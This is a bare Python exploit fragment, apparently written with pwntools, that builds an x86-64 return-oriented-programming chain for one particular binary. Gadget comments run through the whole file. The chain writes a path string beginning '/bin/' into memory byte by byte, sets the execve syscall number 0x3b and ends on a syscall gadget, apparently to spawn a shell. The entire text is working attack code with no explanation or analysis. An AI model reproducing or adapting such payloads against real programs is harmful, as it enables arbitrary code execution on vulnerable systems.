payload = p64(0x429f3a)
#0x429f3a: pop rdx ; retf
payload += p64(0x2f00)+p32(0x438952)+p32(0x33)
# 0x0000000000438952: pop rcx; ret; 
payload += p64(0x457058)+p64(0x43905d)
# 0x000000000043905d: add byte ptr [rcx], dh; shr al, cl; ret; 
payload += p64(0x429f3a)
# 0x429f3a: pop rdx ; retf
payload += p64(0x6200)+p32(0x438952)+p32(0x33)
# 0x0000000000438952: pop rcx; ret; 
payload += p64(0x457059)+p64(0x43905d)
# 0x000000000043905d: add byte ptr [rcx], dh; shr al, cl; ret; 
payload += p64(0x429f3a)
# 0x429f3a: pop rdx ; retf
payload += p64(0x6900)+p32(0x438952)+p32(0x33)
# 0x0000000000438952: pop rcx; ret; 
payload += p64(0x45705a)+p64(0x43905d)
# 0x000000000043905d: add byte ptr [rcx], dh; shr al, cl; ret; 
payload += p64(0x429f3a)
# 0x429f3a: pop rdx ; retf
payload += p64(0x6e00)+p32(0x438952)+p32(0x33)
# 0x0000000000438952: pop rcx; ret; 
payload += p64(0x45705b)+p64(0x43905d)
# 0x000000000043905d: add byte ptr [rcx], dh; shr al, cl; ret; 
payload += p64(0x429f3a)
# 0x429f3a: pop rdx ; retf
payload += p64(0x2f00)+p32(0x438952)+p32(0x33)
# 0x0000000000438952: pop rcx; ret; 
payload += p64(0x45705c)+p64(0x43905d)
# 0x000000000043905d: add byte ptr [rcx], dh; shr al, cl; ret; 
payload += p64(0x429f3a)
# 0x429f3a: pop rdx ; retf
payload += p64(0x6600)+p32(0x438952)+p32(0x33)
# 0x0000000000438952: pop rcx; ret; 
payload += p64(0x45705d)+p64(0x43905d)
# 0x000000000043905d: add byte ptr [rcx], dh; shr al, cl; ret; 
payload += p64(0x429f3a)
# 0x429f3a: pop rdx ; retf
payload += p64(0x6800)+p32(0x438952)+p32(0x33)
# 0x0000000000438952: pop rcx; ret; 
payload += p64(0x45705e)+p64(0x43905d)
# 0x000000000043905d: add byte ptr [rcx], dh; shr al, cl; ret; 
payload += p64(0x429f3a)
# 0x429f3a: pop rdx ; retf
payload += p64(0x0)+p32(0x438952)+p32(0x33)
# 0x0000000000438952: pop rcx; ret; 
payload += p64(0x45705f)+p64(0x43905d)
# 0x000000000043905d: add byte ptr [rcx], dh; shr al, cl; ret; 
payload += p64(0x429f3a)
# 0x429f3a: pop rdx ; retf
payload += p64(0x457058)+p32(0x4468cb)+p32(0x33)
# 0x00000000004468cb: xchg edx, eax; ret 0x148; 
payload += p64(0x43a439)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)
# 0x000000000043a439: xchg edi, eax; ret; 
payload += p64(0x440846)
# 0x0000000000440846: pop rsi; ret 0; 
payload += p64(0x0)+p64(0x429f3a)
# 0x429f3a: pop rdx ; retf
payload += p64(0x3b)+p32(0x4468cb)+p32(0x33)
# 0x00000000004468cb: xchg edx, eax; ret 0x148; 
payload += p64(0x429f3a)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)
# 0x429f3a: pop rdx ; retf
payload += p64(0x0)+p32(0x401d51)+p32(0x33)
# 0x0000000000401d51: syscall; 
payload += b''
